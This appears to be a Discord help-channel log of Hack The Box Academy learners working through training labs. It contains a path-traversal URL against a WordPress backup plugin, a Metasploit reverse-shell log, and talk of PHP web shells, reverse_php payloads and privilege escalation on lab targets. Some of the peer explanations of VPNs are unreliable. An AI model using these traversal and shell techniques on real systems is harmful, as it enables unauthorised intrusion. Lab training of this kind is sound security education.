nah mate, I was able to get it done with another member's help, thanks for streching the helping hand tho!

Hey there, I'm a little stuck on the Linux Fundamentals: Filter Contents final question

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I'm using this curl command combined with some sorting options ||curl https://www.inlanefreight.com/ | grep "https://www.inlanefreight.com/" | sort --unique | wc -l|| and getting a result of ||48||. But that isn't the right answer, any pointers?

Solved! Thanks @neon shard.

@rustic sage @graceful prism After speaking to you both, I think for both of you the takeaway is: Check your output! You never know if your initial command outputs a little extra or less than you expect. Counted lines don't match the answer? Check the lines that you counted and see if there's something in there that you didn't expect!

Haha yup, thanks man!

for sure mate! Thanks

Hi guys, I'm stuck on prolly something very simple.. I just started the fundamental training for linux and the first thing it asks me to do is SSH to an ip with a login ..

however when i type ssh 'ip' in BASH its not connecting

what am I doing wrong?

it takes a while to respond but after a while it tells me connection timeout

hey there I have the same issue

i am at the workflow navigation part and after I spawned the target while trying to ssh , i get no option to input passowrd

ssh: connect to host 10.129.72.xx port 22: Connection timed out

If i want to create my own VM and do these tasks from there, do i need to buy a VPN service?

ssh username@ipadress

i know that. I did do that. ssh htb-student@ip

but it doesn't do anything and after a while I get timeout.

Why would you need a VPN service to use a VM? You would spin up a vm....and use HTBs VPN to connect to THEIR network.

I'm 100% new to cyber so consider me cognitively limited in this subject area

i have no idea what i'm talking about

Have you done the "Getting Started" module? I'd recommend that and other Introductory modules.

I'm doing it yeah but the subjects go a bit over my head still. IT is a foreign field to me and I'm not a native speaker either so doesn't help

I don't understand much about networks or computers beyond the basics

There is a Networking module as well that will help with this.

It says "HTB and other services offering purposefully vulnerable VMs/networks require players to connect to the target network via a VPN to access the private lab network." So i thought i need a VPN

You will need a VPN if you don't want to use the browser based PwnBox on the modules.

yeah thats what i ment i think

i wanna make my own VM on my computer

and use that to do the modules, if thats possible

The modules are ALREADY in a VM....I guess I don't understand why you want it virtualized twice?

A VM would be good if you're going to install Parrot OS or Kali Linux for the Pen Testing tools.

Since you're new, I'd stick to using their PwnBox with everything already built in and it has the "reset" feature.

ok im confused

but like, i don't wanna use the ready made VM that is in there because its laggy on the browser

but yeah i might understand the whole thing wrong idk

hey guys
I am on the Linux Fundamentals module on the System Information section and whenever I try to ssh to htb-student with the given ip every thing just disappears I can still write but I can't use any commands. Is this a bug or can someone explain me what I am doing wrong not to happen this again in the future, please?

@thorny crow does it make any sense what im saying?

like not wanting to use the VM box that is on the browser in the modules

wanting to use my own client version

Yes. Feel free to lookup Kali Linux or Parrot OS and install guides on YouTube.

look into vmware or virtual box

then look for how to set up parrot on them

👍 but do i need a VPN for those to connect to these module things, or no?

yes

so i need to buy like NordVPN or something?

for the vm you need a vpn. for the browser you dont need the vpn

theres a vpn key that you download on each modue i think

and i think you just load it into openvpn

openvpn is a free vpn client

its opensource and comes with no ovpn configs

you would download the ovpn config from the module and load it into openvpn

though i havent done that yet. ive been using the browser and dealing with the lag

yeah so if i download client VM and install parrot on it, i need VPN

ive been seeing some people say they have more problem with the vpn though and they needed to turn off the vpn for the target ip to work so thats why i stick with the browser iinstance

yeah

ohh ok

is there diff which VPN to choose?

is NordVpn good?

openvpn

i wouldnt use your own vpn

htb vpn config for openvpn should have extra security

the htb open vpn config is found in each section near the tartget ip. its a button that says "get a vpn key"

ohh

so wait so openVPN is like a VPN provider such as NordVPN?

or no?

you first download openvpn client, then download the key from the "get a key button"

no its just a client

ohh okay

its free?

yes

whats the diff of like NordVPN and OpenVPN

nord is a client and a vpn service that you pay monthly for

but they both do the same thing or no?

why would you pay for VPN service if u get VPN for free

i think the htb key that you load into openvpn will have more security to keep out hackers

the htb key is just for htb . it probably blocks sites that are not related to htb

nord will let you use any site

My knowledge on VPN's is so limited

i dont understand XD

So does HTB host this OpenVPN or something?

or how is it free?

the htb vpn will only be used for hack the box mosules

open vpn connects to htb servers only

nord connects to nords servers and unblocks all websites

and one purpose of a vpn is to hide your real ip so you cant be attacked by hackers

also vpns would have their own security set up so will protect you a bit more if you dont know how to secure your own network

So is VPN like a virtual router or something

a vpn is a virtual private network. youre connecting to another network for protection. its like a shield from the internet. though you need to be careful what vpns you trust because the vpn company can see your internet traffic.

Ok, but what does a VPN service provider get paid for? Whats their like thing where they put money so that they can make money

They have hardware that support alot of people connecting to their network? or something

it comes down to who do you trust more, your isp to see your traffic or the vpn provider to see your traffic. or the random hackers seeing your real ip and gaining access to your home network.

hey all im working on the getting started module and im on the public exploits page and trying to complete the challenge at the bottom, but I cant even ping the target machine. im trying to ping from the box htb gives us, no luck

a vpn is for protection

its another layer of security

thats what you pay for

Yeah but like. Do the VPN providers get their VPN service out of air? They pay nothing to make millions?

What is the resource they have, that enables them to have this VPN service, that makes them money

are your a reporter or something? why does it matter?

I think they just have a lot of servers all over the world usually

@atomic light Because i'm trying to understand how it works

they pay money to build their own servers in different countries

i guess i need to check some youtube guide or something on VPNs

you can make your own vpn server on a computer that has fast internet. then you can connect many computers to that computer from anywhere in the world

but the vpn providers have a lot of clients so they build super computers in data centers with super fast gigabit internet. gigabit internet is not cheap

and the computers break and need to be replaced

the vpn providers set up extra security to protect you from hackers. thats why you pay them. some vpns are faster than others. some vpns are capped at 50mbps

other more expensive vpns cap out at 1gbps

the vpn providers have to pay for gibabit internet so you can surf the internet with their vpn

Ahh i understand, thanks!

anybody here sovled the getting started | Public exploits using searchsploit?

I cannot find what the path to the htb-student's mail is. This is btw Linux Fundementals

check File System Hierarchy it'll give you an idea where to check for email

you mean with cat /etc/passwd? or something else

btw i'm very new to linux

something else its just asking you what dir the email is in if you go check the File system hierarchy> 1st page of the module

I tried the dir it gave me on the first page

that didn't work tho

||*/var||

i tried that one

its incomplete

send you a dm what I tried

How can I help?

what have you tried so far?

so some say there is a way to get the flag.txt with just searchsploit, i got the flag using metasploit, just wondering how was it done by searchsploit just doing by one simple command in the browser

My flags arent working for the web requests module. i've tried using my VM originally i thought i was because of burp suite reloading caused the target to get reset but now im not the docker and it still wont accept my flag

the flag is identical.

Hi all! Been a bit stuck on the Getting Started > Public Exploits exercise. Would someone be able to point me in the right direction?

|| - I found the exploit here: https://www.exploit-db.com/exploits/39883

• I'm assuming it's the file download vulnerability we're dealing with
• Trying to download the flag file using this link structure mentioned in the exploit: http://[ip]:[port]/wp-admin/tools.php?page=backup_manager&download_backup_file=../flag.txt
• File is blank, what am I missing here?

[edit] Someone helped out, I was going down the wrong path. Make sure you're using metasploit! ||

Thanks!

Help! Stuck at getting started module knowledge check. I was able to get user flag, but now I can't reverse shell anymore. I keep getting this with metasploit:
"[] Started reverse TCP handler on 10.10.14.187:4444
[] 10.129.231.55:80 - Authenticating...
[+] 10.129.231.55:80 - The authentication process is done successfully!
[] 10.129.231.55:80 - Extracting Cookies Information...
[] 10.129.231.55:80 - Uploading payload...
[-] 10.129.231.55:80 - Exploit aborted due to failure: unknown: 10.129.231.55:80 - Upload failed
[*] Exploit completed, but no session was created."
It worked and then it stopped working. I tried rebooting, changing vpn, changing target...!

What helped me with that was going back in the pentesting basics section and double check so I don't forget anything.

Nobody knows how to help me? If u do please ping me.

what section exactly in the module?

POST

mine is ending with 29e

you find it yet?

Why is it that for the website of Knowledge Check I can login as admin, but when I use the same credentials for metasploit it fails?

Check back the "Nibbles - Web Footprinting" section

What do you mean by it fails?

it fails to login. "permission denied"

@sweet heron

I'm stuck with metasploiot too. It used to workd and not it just fails to upload.

huh

Can somebody help me please?

It's asking me what non-standard application is running under the current user?

I've tried get-process and the task manager and still can't seem to find the single application they are asking for

try ps aux to list all current running processes. look for all the processes running under that user. maybe you will see something that sticks out

I am sorry I should have specified I am in the windows fundamentals module

Get-Process -IncludeUserName see if you can do the same with that

Im stuck at Getting Started > knowledge check at root, i found NOPASSWD folder but i still cant sudo or open it

Thanks I got it...the answer was right in my face the whole time]

hey guys, i need help in the skills assesment part for Javascript obsfucation

the question is = As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable.

i think i already got the flag but it says its wrong

hey man

So you're at Obfuscation -> Deobfuscateion, the interactive module?

skills assesment page

Thanks to @neon shard for helping me

Haha well I asked you where you're at, you explained it to me, and then realized you had the answer already

hello im on SQL INJECTION FUNDAMENTALS > Skills Assessment - SQL Injection Fundamentals
i was able to upload a php shell but when i try to do ||"ls /"|| it doesnt show anything but ||"ls"|| works

Help pls

They're different for each target

HI all I'm stuck on the intro to web apps - HTML injection. I can I can change the text but I can't seem to link the website. Am I missing something obvious?

I'm stuck at the fundementals of Linux and someone helped me. But even with the right command the site says it wrong. And ideas?

It almost seams like the OS is updatet, but the answer on the site isn't.

hmm

where about are you?

Linux Fundementals

Where in particular? 😮

System Information page

Hi, i'm stuck in JAVASCRIPT DEOBFUSCATION / Skills assessments, question 2. Even with the hint i don't really understand the flag format expected. I tried a lot of combinations but still don't work (i feel idiot on this since it's the only one answer i can't find in this skills assessments) [SOLVED]

Hey panda, can you DM me where you're stuck

I'll give you a nudge

Question : How many files exist on the system that have the ".bak" extension?

Topic : Find Files and Directories

(Linux Fundamentals)

Hey @quiet forum to prevent any spoilers, shall I give you a nudge in a dm?

noted 😜

Hi! I have been stuck on this question for a while "How many files exist on the system that have the ".bak" extension?".
I have tried numerous different ways to search, and gotten numerous results, however, none seem to be correct. I would really appreciate it if someone could give me a push in the right direction. I have mainly been trying to use xxxxxxxxxxxxxxxxxxxxxxxxxx Xxxxxxxxxxxxxxxxxxxxxxxxxx
i have even tried finding every file on the entire system, and restricting it with ```
xxxxxxxx

dude spoilerssss

sorry

im new, my bad!

Anyone here that can help with SQL injection fundementals? The authentication to the mysql database seems to not be working. Seems like someone else was asking about this 3 days ago as well, but I couldn't find a answer.

The command I'm suing is as follows "mysql -u root -h <ip> -P <port> -p", but it gives the error message "RROR 2002 (HY000): Can't connect to MySQL server on '206.189.121.131' (115)"

I have tried restarting my workstation and target, but nothing seems to help.

yes

cam i dm you

Man this fundamentals networking module is HEAVY. The addressing portion blows right over my head. Anyone know like video resource or something that helps explain this?

Would someone be able to tell me if what I did to answer one of the Linux questions was the best way to go? I don't want to say too much and give any spoilers.

sure thing, dm me

hey Casper, shoot me a dm

guys in the knowledge check module of getting started , ||i made a reverse shell using metasploit ||but i can't find user_flag anywhere ... some advice?

Hi im stuck on the last section of the SQL INJECTION FUNDAMENTALS MODULE
I have to find a flag in the / root directory
I was able to upload a php shell file to be able to run commands.
It works when I do commands like "ls" or "pwd", but when I try "ls" with a different path it wont work, like "ls /" or "ls .."

What did you mean by it was talking about the stack in the theory section? In theory, wouldn't EBP be the base of the stack, and thus be 0 (relative to the frame)? This question is so confusing, because EBP changes throughout the execution of the code (at least as far as I understand). I have no idea what it is asking for.

Is there any way to hack vr. Gűey

Hi

any pointers on the reverse shell? I connected via metasploit but haven't figured out the reverse shell yet.

I stumbled my way through the sub netting with the help of this one. https://www.youtube.com/watch?v=POPoAjWFkGg&t=421s

GETTING STARTED
Page 23
Knowledge Check

im stuck here

in metasploit i specified the username and password and remote host and target uri

metasploit says its success full but failed to give me a shell

Maybe I'm wrong but I think that if you are connecting via Metasploit, you are actually using a reverse shell
If I'm wrong, it doesn't matter because you are doing the right thing anyway

i think im putting in the wrong target uri

but i cant find the file upload button on the admin panel

so yeah I think your right. I guess I am more after "upgrading the shell" I can only run limted commands via the metasploit connection. Sounds like we stuck at the same spot pretty much.

i also think im supposed to specify the path to the plugin for target uri but i dont know what the path is

did you get the first flag? or is that what your trying to do now?

i havent gotten any flags yet

You can actually find the first flag, you can navigate using the CD and ls command

im trying to exploit teh file upload

Think of that as a normal folder where you need to go deeper using the CD command

there are 2 exploits for the plugin if you search in metasploit. the first one for rce does not work. but the second one for file upload works but fails to give me a shell

yeah I got the first one... i am trying to escalate my privileges now to find the root flag

sent you DM

k

I'm stuck at the same place on knowledge check. The metasploit script just fail I tried different payload, but nothing. I got it working once and have the first flag, but I can't get a reverse shell anymore.

you still there? I'm stuck there too. I'm trying to debug with burpsuite, but I don't get why it worked once...!!

i got a meterpreter session

@tidal mango Thanks i'll check that out!

i had to reset the target ip

and i used the rce exploit

the target uri must stay as default too

i dont know how to use meterpreter though

you can type help for meterpreter commands or change the payload in metasploit for a regular shell.

i typed shell in meterpreter and is says it was created but doesnt give me a shell

I get "Exploit completed, but no session was created." with the RCE script.

that happened to me too untill i refreshed the target ip in the section and specified the new ip for rhost

you also need to specify lhost

yeah tried different target all night long yersterday xD

you only need to set rhost and lhost. dont set anything else

yup nothing. I set lhost as tun0 or (manually enter my vpn ip) and rhost as the target ip. It worked once yesterday, then nothing.

pm me what plugin exploit you are usiing

crypto

also im using the pwnbox in a browser, not my own vm

Module: Getting Started
Page: Knowledge Check
Question: Can exploit the target but if I try the "shell" command in metapeter but I get no responding. So what I have to do?

yeah me too

i found this but i dont know how to use them

https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/

Try set php and "tab" to see the different options and try maybe php/reverse_php maybe?

Module: Getting Started

Section: Public Exploits

Question: i cant find the targets services

like i dont know where to look

check back the service scanning section then

no like, i get that, but i see 2 different services running for the web app

let me check it out again

and neither work for my exploit

when you find the login info and log in, at the bottom of the page will say the plugin and version

where would i find that?

you have to use gobuster to find all the directories as explained in one of the sections

then you explore the files in each directory

ahhhhh, gotcha, forgot about gobuster

hehehe!

ok it says it runs apache 2.4.41

so i should look for exploits on that plugin?

that's the right approach. But there is somethin that server runs that is even more obvious.

i saw nginx too

you have to login to the admin panel

find the login info

gotcha

something even more obvious! 😉

any hint? ive been stuck on this for an hour lmao

have you gone on the website?

yes

oh

SQL?

the main admin page you start on after logged in says it at the bottom of the page

powered by

man

days like this really make me wish i had a brain

you found any exploit? What are you using to search them?

msfconsole

alright im not gonna lie i am completely stuck

use searchsploit

can someone give me a bit of a walkthrough?

how do i use the exploits on searchsploit

There I used basic bash commands to read the file it refers to.

gotcha

what commands would i need?

not used to bash too much? You should check out their linux module and the cheat sheet. The trick here is that the path it refers to is not an absolute path (it doesn't start from /), but relative path starting somewhere. So you nice to 'locate' that file's full path so you can 'cat' it.

gotcha, thank you

i do know those command

Same here, I just get a blinking cursor and no response back after I type shell

but do commands work?

its only a meterpreter session, its not a real shell so bash commands arent working. and only some of the meterpreter commands are working. i think the rest of the meterpreter commands will work if we can get a shell but typing shell isnt giving a shell. i also was able to upload my own shell.sh reverse tcp through meterpreter and did a chmod but when i use execute -f the shell does not run, but it says it turned it into a process. i also double checked that my reverse tcp shell.sh has my hosts ip to connect back to me and i started a listener on the same port that i set in my shell.sh and it all looks good but the shell.sh is not starting

or maybe that port is blocked

so then i tried starting a listener on port 80 on my host but the terminal is saying port 80 is in use because my meterpreter session is using port 80

have you tried another metasploit payload?

i dont know how to switch payloads. the sections didnt say how to even set a payload

Try set payload php and "tab" to see the different options and try maybe php/reverse_php. I already hinted that.

when?

after i have a meterpreter session?

no before. It's a script option, just like rhost and lhost

msf6 exploit(multi/http/---------------------) > set payload php
[-] The value specified for payload is not valid.

"tab" to see the list of possible payload.

nothing shows up with tab

oh i fiigured out tab

i was doing a space before i did tab

tab is a precious tool for autocompletions with bash

thanks that did it

Glad to hear!

now im trying to escalate in meteploit

i tried typing getsystem

but it didnt work

i guess now i need to create my own reverse tcp now that i have a shell. then i will try to escalate netcat

i did get the first flag though thanks to you

What's your target IP by curiosity? I still can't get any shell. I'm stuck with a bug... 😦

oh i forgot i cant post ips in here

ooh oops! Didn't know that

i pmed you

ok it's not the same Ip i had that was working yesterday

Once I connected via VPN the shell responds. When trying it from the website interface it does not

i can get a shell by changing the paypload to a reverse php

i just cant escalate priviledges from metasploit

you can find some interesting results with the commmands in the privesc section of the cheat sheet.